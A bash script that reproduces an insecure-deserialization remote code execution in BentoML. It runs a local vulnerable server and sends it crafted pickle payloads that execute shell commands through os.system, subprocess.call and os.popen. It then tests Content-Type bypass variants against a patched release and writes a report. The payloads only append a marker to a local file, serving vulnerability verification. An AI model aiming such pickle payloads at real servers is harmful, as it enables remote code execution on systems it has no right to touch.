#!/usr/bin/env bash
set -euo pipefail

# Reproduction script for GHSA-33xw-247w-6hmc / CVE-2025-27520
# BentoML <=1.4.2 insecure deserialization via application/vnd.bentoml+pickle
# Exit codes: 0 = reproduced, 1 = not reproduced (a failing setup step aborts early via `set -e` with a non-zero status)

# --- Configuration -----------------------------------------------------------
# Artifacts live next to this script: logs/ holds evidence, work/ holds the
# generated service, and ../repro receives the Markdown report.
SCRIPT_PATH="$(readlink -f "$0")"
BASE_DIR="$(dirname "$SCRIPT_PATH")"
LOG_DIR="$BASE_DIR/logs"
WORK_DIR="$BASE_DIR/work"
REPORT_DIR="$BASE_DIR/../repro"

# Interpreter, pip, and listen address may be overridden from the environment,
# e.g. `PYTHON_BIN=python3.11 REPRO_PORT=4000 ./script.sh`. The REPRO_ prefix
# keeps a generic PORT/HOST exported by the surrounding environment from
# silently changing where the servers bind.
PYTHON_BIN="${PYTHON_BIN:-python3}"
PIP_BIN="${PIP_BIN:-pip3}"
PORT="${REPRO_PORT:-3000}"                 # vulnerable server
PATCHED_PORT="${REPRO_PATCHED_PORT:-3001}" # patched server
HOST="${REPRO_HOST:-127.0.0.1}"

# Per-server pid files and logs, plus the evidence files checked afterwards.
PID_FILE="$LOG_DIR/server.pid"
PID_FILE_PATCHED="$LOG_DIR/server_patched.pid"
SERVER_LOG="$LOG_DIR/server.log"
SERVER_LOG_PATCHED="$LOG_DIR/server_patched.log"
ENV_LOG="$LOG_DIR/env.txt"
PROOF_FILE="$LOG_DIR/rce_proof.txt"
PROOF_FILE_PATCHED="$LOG_DIR/rce_proof_patched.txt"
PATCH_DIFF_LOG="$LOG_DIR/patch_diff_1.4.2_latest.txt"

mkdir -p "$LOG_DIR" "$WORK_DIR" "$REPORT_DIR"

# Emit a timestamped "[repro]" line to stdout and append it to logs/repro.log.
log() {
  printf '[repro] %s - %s\n' "$(date '+%F %T')" "$*" | tee -a "$LOG_DIR/repro.log"
}

#######################################
# Stop the process whose PID is stored in a pid file, then delete the file.
# Sends SIGTERM, polls for up to ~2 s, and sends SIGKILL only if the process
# is still alive (avoids signalling a PID that may already have been reused).
# Arguments: $1 - path to the pid file; a missing file is a no-op.
# Returns:   0
#######################################
kill_pidfile() {
  local f="$1"
  [[ -f "$f" ]] || return 0
  local pid
  pid=$(cat "$f" 2>/dev/null || true)
  # Ignore empty or non-numeric contents instead of handing them to kill.
  if [[ "$pid" =~ ^[0-9]+$ ]] && kill -0 "$pid" 2>/dev/null; then
    kill "$pid" 2>/dev/null || true
    local i
    for ((i = 0; i < 10; i++)); do
      kill -0 "$pid" 2>/dev/null || break
      sleep 0.2
    done
    if kill -0 "$pid" 2>/dev/null; then
      kill -9 "$pid" 2>/dev/null || true
    fi
  fi
  rm -f -- "$f"
}

#######################################
# Read `ss -lntp` output on stdin and print, one per line and de-duplicated,
# the PIDs listening on exactly the given port.
# Arguments: $1 - TCP port number
#######################################
_ss_listen_pids() {
  local port="$1"
  # Column 4 is "Local Address:Port". Compare its suffix literally so port
  # 3000 does not also match 30001, and collect every pid=N on the line since
  # several processes can share one listening socket.
  awk -v suffix=":${port}" '
    {
      n = length($4) - length(suffix)
      if (n < 0 || substr($4, n + 1) != suffix) next
      rest = $0
      while (match(rest, /pid=[0-9]+/)) {
        print substr(rest, RSTART + 4, RLENGTH - 4)
        rest = substr(rest, RSTART + RLENGTH)
      }
    }' | sort -nu
}

#######################################
# Kill whatever is listening on a TCP port: SIGTERM, wait 1 s, then SIGKILL.
# Uses lsof when available, otherwise ss; does nothing when neither tool is
# installed or nothing is listening.
# Arguments: $1 - TCP port number
# Returns:   0
#######################################
kill_port() {
  local port="$1"
  local pids=""
  if command -v lsof >/dev/null 2>&1; then
    pids=$(lsof -iTCP:"${port}" -sTCP:LISTEN -t 2>/dev/null || true)
  elif command -v ss >/dev/null 2>&1; then
    pids=$(ss -lntp 2>/dev/null | _ss_listen_pids "$port" || true)
  fi
  # Nothing listening: skip the grace-period sleep entirely.
  [[ -n "$pids" ]] || return 0
  local -a pid_list
  mapfile -t pid_list <<<"$pids"
  kill "${pid_list[@]}" 2>/dev/null || true
  sleep 1
  kill -9 "${pid_list[@]}" 2>/dev/null || true
}

# Shared teardown: stop the pid recorded in a pid file, then anything still
# bound to the server's port.
_stop_server() {
  local pidfile="$1" listen_port="$2"
  kill_pidfile "$pidfile"
  kill_port "$listen_port"
}

# Tear down the vulnerable server (pid file + port).
kill_if_running() {
  _stop_server "$PID_FILE" "$PORT"
}

# Tear down the patched server (pid file + port).
kill_if_running_patched() {
  _stop_server "$PID_FILE_PATCHED" "$PATCHED_PORT"
}

# Print a "=== <title> ===" banner line.
_env_section() {
  printf '=== %s ===\n' "$1"
}

#######################################
# Snapshot system, Python, pip, and listening-socket details into $ENV_LOG.
# Every probe is best effort; a missing tool only leaves its section short.
#######################################
record_env() {
  local -a labels=("Python" "Pip")
  local -a tools=("$PYTHON_BIN" "$PIP_BIN")
  local idx
  {
    _env_section "System"
    uname -a || true
    for idx in 0 1; do
      printf '\n'
      _env_section "${labels[idx]}"
      command -v "${tools[idx]}" || true
      "${tools[idx]}" -V || true
    done
    printf '\n'
    _env_section "Network (ports $PORT,$PATCHED_PORT)"
    ss -lntp 2>/dev/null || true
  } >"$ENV_LOG" 2>&1 || true
}

#######################################
# Install the vulnerable BentoML range (>=1.3.4,<1.4.3) plus requests.
# Globals:   PIP_BIN, PYTHON_BIN, LOG_DIR (read)
# Outputs:   pip output is appended to $LOG_DIR/pip_install.log so that a
#            failed install can be diagnosed instead of vanishing.
# Returns:   0 on success, 1 if the bentoml install fails.
#######################################
install_deps_vuln() {
  local pip_log="$LOG_DIR/pip_install.log"
  log "Installing vulnerable bentoml range (<1.4.3) and requests"
  # Upgrading pip/wheel is only a convenience; failure is tolerated.
  "$PIP_BIN" install --upgrade pip wheel >>"$pip_log" 2>&1 || true
  if ! "$PIP_BIN" install "bentoml>=1.3.4,<1.4.3" requests >>"$pip_log" 2>&1; then
    log "pip failed to install vulnerable bentoml; see $pip_log"
    return 1
  fi
  local version
  version=$("$PYTHON_BIN" -c 'import bentoml;print(bentoml.__version__)') || version="unknown"
  log "Installed vulnerable bentoml: ${version}"
}

#######################################
# Upgrade to the newest patched BentoML (>=1.4.3) plus requests.
# Globals:   PIP_BIN, PYTHON_BIN, LOG_DIR (read)
# Outputs:   pip output is appended to $LOG_DIR/pip_install.log.
# Returns:   0 on success, 1 if the install fails.
#######################################
install_deps_patched() {
  local pip_log="$LOG_DIR/pip_install.log"
  log "Installing latest patched bentoml (>=1.4.3)"
  if ! "$PIP_BIN" install --upgrade "bentoml>=1.4.3" requests >>"$pip_log" 2>&1; then
    log "pip failed to install patched bentoml; see $pip_log"
    return 1
  fi
  local version
  version=$("$PYTHON_BIN" -c 'import bentoml;print(bentoml.__version__)') || version="unknown"
  log "Installed patched bentoml: ${version}"
}

# Write the minimal BentoML service (service:Summarization) into $WORK_DIR.
create_service() {
  local target="$WORK_DIR/service.py"
  # Quoted 'PY' delimiter: the Python source is written verbatim with no shell
  # expansion; the file is overwritten on every call.
  cat <<'PY' >"$target"
from __future__ import annotations
import bentoml

# Minimal service with a single API method. The vulnerability is triggered
# before this method executes, during request deserialization.
@bentoml.service()
class Summarization:
    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        # Echo back the inputs; business logic is irrelevant for the PoC
        return [str(t) for t in texts]
PY
}

#######################################
# Launch `bentoml serve service:Summarization` in the background.
# Arguments: $1 port, $2 log file (truncated first), $3 pid file,
#            $4 banner logged before launch, $5 prefix for the "started" line.
#######################################
_launch_bentoml() {
  local listen_port="$1" logfile="$2" pidfile="$3" banner="$4" started="$5"
  log "$banner"
  : > "$logfile"
  nohup env PYTHONUNBUFFERED=1 PYTHONPATH="$WORK_DIR" \
    bentoml serve service:Summarization --host "$HOST" --port "$listen_port" \
    >>"$logfile" 2>&1 &
  printf '%s\n' "$!" > "$pidfile"
  log "$started $(cat "$pidfile")"
}

# Start the vulnerable server on $HOST:$PORT.
start_server() {
  _launch_bentoml "$PORT" "$SERVER_LOG" "$PID_FILE" \
    "Starting BentoML service on ${HOST}:${PORT}" \
    "Server started with pid"
}

# Start the patched server on $HOST:$PATCHED_PORT.
start_server_patched() {
  _launch_bentoml "$PATCHED_PORT" "$SERVER_LOG_PATCHED" "$PID_FILE_PATCHED" \
    "Starting patched BentoML service on ${HOST}:${PATCHED_PORT}" \
    "Patched server started with pid"
}

#######################################
# Poll http://$HOST:<port>/ until it answers with a non-error status.
# Arguments: $1 - port
#            $2 - server log whose last 50 lines are printed on failure
#            $3 - optional pid file; if that process exits, stop waiting
#                 early instead of burning the whole 90 s deadline
# Returns:   0 once the server responds; 1 on timeout or early server exit.
#######################################
wait_for_server() {
  local port="$1" logf="$2" pidfile="${3:-}"
  local pid=""
  log "Waiting for server on port ${port} to become ready..."
  if [[ -n "$pidfile" && -f "$pidfile" ]]; then
    pid=$(cat "$pidfile" 2>/dev/null || true)
    [[ "$pid" =~ ^[0-9]+$ ]] || pid=""
  fi
  local deadline=$((SECONDS + 90))
  while (( SECONDS < deadline )); do
    # --max-time bounds each probe so a hung connection cannot stall the loop.
    if curl -fsS --max-time 5 "http://${HOST}:${port}/" >/dev/null 2>&1; then
      log "Server on ${port} is responding"
      return 0
    fi
    if [[ -n "$pid" ]] && ! kill -0 "$pid" 2>/dev/null; then
      log "Server process ${pid} exited before becoming ready. Last 50 lines:"
      tail -n 50 "$logf" || true
      return 1
    fi
    sleep 2
  done
  log "Server on ${port} did not become ready. Last 50 lines:"
  tail -n 50 "$logf" || true
  return 1
}

#######################################
# Send one pickled payload to the vulnerable server's /summarize endpoint
# with Content-Type application/vnd.bentoml+pickle. If the server unpickles
# it, a shell command appends <marker> to $PROOF_FILE. Attempt ids pick the
# callable: 1 -> os.system, 2 -> subprocess.call, anything else -> os.popen.
# Arguments: $1 - attempt id; $2 - marker string
# Globals:   PYTHON_BIN, HOST, PORT, PROOF_FILE, LOG_DIR (read)
# Outputs:   client output in $LOG_DIR/exploit_attempt_<id>.log
# Returns:   0 always; success is judged later from $PROOF_FILE.
#######################################
run_exploit_attempt() {
  local attempt_id="$1" marker="$2"
  local log_file="$LOG_DIR/exploit_attempt_${attempt_id}.log"
  : > "$log_file"
  log "Attempt ${attempt_id}: sending malicious pickle with marker ${marker}"
  "$PYTHON_BIN" - "$HOST" "$PORT" "$marker" "$PROOF_FILE" "$attempt_id" << 'PY' >>"$log_file" 2>&1 || true
import sys, pickle, shlex
import requests
host = sys.argv[1]
port = int(sys.argv[2])
marker = sys.argv[3]
proof_file = sys.argv[4]
attempt = sys.argv[5]
url = f"http://{host}:{port}/summarize"
headers = {'Content-Type': 'application/vnd.bentoml+pickle'}

# Shell snippet run on the server. shlex.quote keeps the marker and proof path
# intact even when the path contains spaces or quotes.
append_cmd = f"echo {shlex.quote(marker)} >> {shlex.quote(proof_file)}"
sh_cmd = "/bin/sh -lc " + shlex.quote(append_cmd)

class Evil:
    # pickle records the (callable, args) pair returned here; unpickling calls it.
    def __reduce__(self):
        if attempt == '1':
            return (__import__('os').system, (sh_cmd,))
        elif attempt == '2':
            return (__import__('subprocess').call, (["/bin/sh", "-lc", append_cmd],))
        else:
            return (__import__('os').popen, (sh_cmd,))

payload = pickle.dumps(Evil(), protocol=4)
print(f"[*] Payload length: {len(payload)} bytes")
try:
    r = requests.post(url, data=payload, headers=headers, timeout=15)
    print(f"[*] Response: {r.status_code} {r.text[:200]!r}")
except Exception as e:
    print(f"[!] Request error: {e}")
PY
}

#######################################
# Fire the os.system pickle payload at the patched server under 10
# Content-Type variations. Any marker that appears in $PROOF_FILE_PATCHED
# means a variation still reached the pickle deserializer.
# Globals:   PYTHON_BIN, HOST, PATCHED_PORT, PROOF_FILE_PATCHED, LOG_DIR (read)
# Outputs:   one result line per variation in $LOG_DIR/patched_attempts.log
# Returns:   0 always.
#######################################
run_patched_bypass_suite() {
  local attempts_log="$LOG_DIR/patched_attempts.log"
  : > "$PROOF_FILE_PATCHED"
  # Start the attempts log fresh so it describes this run only, matching the
  # freshly truncated proof file instead of accumulating earlier runs.
  : > "$attempts_log"
  # 10 distinct variation attempts against patched server
  "$PYTHON_BIN" - "$HOST" "$PATCHED_PORT" "$PROOF_FILE_PATCHED" << 'PY' >>"$attempts_log" 2>&1 || true
import sys, pickle, shlex, time
import requests
host = sys.argv[1]
port = int(sys.argv[2])
proof_file = sys.argv[3]
url = f"http://{host}:{port}/summarize"
variations = [
    'application/vnd.bentoml+pickle',
    'Application/Vnd.BentoML+Pickle',
    'application/vnd.bentoml+pickle; charset=UTF-8',
    'application/vnd.bentoml+pickle; q=1',
    'application/vnd.bentoml+PICKLE',
    'application/vnd.bentoml+pickle ',
    'application/vnd.bentoml+pickle;param=x',
    'application/octet-stream',
    'text/plain',
    'application/vnd.bentoml+pickle, application/json',
]

class Evil:
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (__import__('os').system, (self.cmd,))

for i, ct in enumerate(variations, 1):
    marker = f'PATCHED_TRY_{i}_{int(time.time()*1000)}'
    # shlex.quote keeps proof paths with spaces or quotes intact.
    append_cmd = f"echo {shlex.quote(marker)} >> {shlex.quote(proof_file)}"
    cmd = "/bin/sh -lc " + shlex.quote(append_cmd)
    payload = pickle.dumps(Evil(cmd), protocol=4)
    try:
        r = requests.post(url, data=payload, headers={'Content-Type': ct}, timeout=10)
        print(i, ct, r.status_code)
    except Exception as e:
        print(i, ct, 'error', e)
PY
}

verify_proof_contains() {
  local expected="$1"
  if [[ -f "$PROOF_FILE" ]] && grep -Fq "$expected" "$PROOF_FILE"; then
    return 0
  fi
  return 1
}

#######################################
# Write $REPORT_DIR/patch_analysis.md summarizing the patched-version check.
# Status is "STILL WORKS" if any marker landed in $PROOF_FILE_PATCHED,
# otherwise "BLOCKED".
# Globals:   PYTHON_BIN, LOG_DIR, REPORT_DIR, SERVER_LOG, SERVER_LOG_PATCHED,
#            PROOF_FILE, PROOF_FILE_PATCHED, PATCH_DIFF_LOG (read)
#######################################
write_patch_analysis() {
  local patched_version vuln_version status="BLOCKED"
  patched_version="$("$PYTHON_BIN" -c 'import bentoml;print(bentoml.__version__)' 2>/dev/null || echo unknown)"
  # Report the vulnerable version actually installed, taken from the latest
  # "Installed vulnerable bentoml: <ver>" line in repro.log; fall back to 1.4.2
  # when that line is missing or empty.
  vuln_version="$(sed -n 's/.*Installed vulnerable bentoml: \([^ ]*\).*/\1/p' "$LOG_DIR/repro.log" 2>/dev/null | tail -n 1 || true)"
  vuln_version="${vuln_version:-1.4.2}"
  if [[ -s "$PROOF_FILE_PATCHED" ]]; then
    status="STILL WORKS"
  fi
  cat > "$REPORT_DIR/patch_analysis.md" << EOF
# Patch Analysis - GHSA-33xw-247w-6hmc (CVE-2025-27520)

- Vulnerable version tested: ${vuln_version} (installed via constraint <1.4.3)
- Latest patched version tested: ${patched_version}
- Patch verification result: ${status}

Artifacts:
- Server logs (vulnerable): ${SERVER_LOG}
- Server logs (patched): ${SERVER_LOG_PATCHED}
- Proof (vulnerable): ${PROOF_FILE}
- Proof (patched): ${PROOF_FILE_PATCHED}
- Serde patch diff: ${PATCH_DIFF_LOG}

Bypass attempts (10 variations of Content-Type) executed against patched server; see logs/patched_attempts.log
EOF
}

capture_patch_diff() {
  # Save serde.py from vulnerable and latest environments and diff them
  cp /usr/local/lib/python3.11/dist-packages/_bentoml_impl/serde.py "$LOG_DIR/serde_vuln_1.4.2.py" 2>/dev/null || true
  "$PIP_BIN" install --upgrade "bentoml>=1.4.3" >/dev/null 2>&1 || true
  python3 - << 'PY' >"$PATCH_DIFF_LOG" 2>/dev/null || true
import importlib, inspect, sys, difflib
try:
    import importlib
    m = importlib.import_module('_bentoml_impl.serde')
    patched_path = inspect.getsourcefile(m) or ''
except Exception:
    patched_path = ''
old = open('"$LOG_DIR"/serde_vuln_1.4.2.py','r',errors='ignore').read().splitlines(True) if open('"$LOG_DIR"/serde_vuln_1.4.2.py','r',errors='ignore') else []
new = open(patched_path,'r',errors='ignore').read().splitlines(True) if patched_path else []
sys.stdout.writelines(difflib.unified_diff(old,new,fromfile='serde_vuln_1.4.2.py',tofile='serde_patched_latest.py'))
PY
}

#######################################
# Drive the reproduction:
#   1. Start a vulnerable BentoML server and fire three pickle payloads at it.
#   2. Check the proof file.
#   3. As a best-effort extra for the report only, repeat against a patched
#      release, diff serde.py, and write the analysis.
# Exits 0 if all three markers reached $PROOF_FILE, otherwise 1.
#######################################
main() {
  # On an early exit (set -e abort or explicit exit), don't leave servers
  # running. Cleared before the normal exit, by which point both are stopped.
  trap 'kill_if_running; kill_if_running_patched' EXIT

  record_env
  kill_if_running
  install_deps_vuln
  create_service
  start_server
  if ! wait_for_server "$PORT" "$SERVER_LOG" "$PID_FILE"; then
    log "Server failed to start. Aborting."
    exit 1
  fi

  # Unique per-run markers so proof lines from earlier runs never count.
  local ts
  ts="$(date +%s%N)"
  local -a markers=()
  local i
  for i in 1 2 3; do
    markers+=("RCE_ATTEMPT_${i}_${ts}")
  done

  : > "$PROOF_FILE"
  for i in 1 2 3; do
    run_exploit_attempt "$i" "${markers[i - 1]}"
    sleep 1
  done

  log "Server log tail (vulnerable):"
  tail -n 80 "$SERVER_LOG" | sed 's/^/[server] /' | tee -a "$LOG_DIR/repro.log" >/dev/null || true

  # Reproduced only if every attempt's marker landed in the proof file.
  local reproduced=0 marker
  for marker in "${markers[@]}"; do
    verify_proof_contains "$marker" || reproduced=1
  done

  if (( reproduced == 0 )); then
    log "SUCCESS: Insecure deserialization RCE reproduced on vulnerable version. Proof: $PROOF_FILE"
  else
    log "FAILURE: Exploit did not create expected markers on vulnerable version."
  fi

  # Stop vulnerable server
  kill_if_running

  # Patched verification is for documentation only: failures here are logged
  # and must not change the exit code. Commands in an `if` condition run with
  # set -e suspended, so a failed install cannot abort the script. Clear any
  # stale patched server first so readiness isn't answered by an old process.
  kill_if_running_patched
  if install_deps_patched && start_server_patched \
    && wait_for_server "$PATCHED_PORT" "$SERVER_LOG_PATCHED" "$PID_FILE_PATCHED"; then
    run_patched_bypass_suite
    log "Patched server log tail:"
    tail -n 80 "$SERVER_LOG_PATCHED" | sed 's/^/[server patched] /' | tee -a "$LOG_DIR/repro.log" >/dev/null || true
  else
    log "Patched verification skipped: install or server startup failed."
  fi
  kill_if_running_patched

  capture_patch_diff || true
  write_patch_analysis || true

  trap - EXIT
  exit "$reproduced"
}

# Entry point. main reads no positional arguments today; "$@" is forwarded
# unchanged.
main "$@"
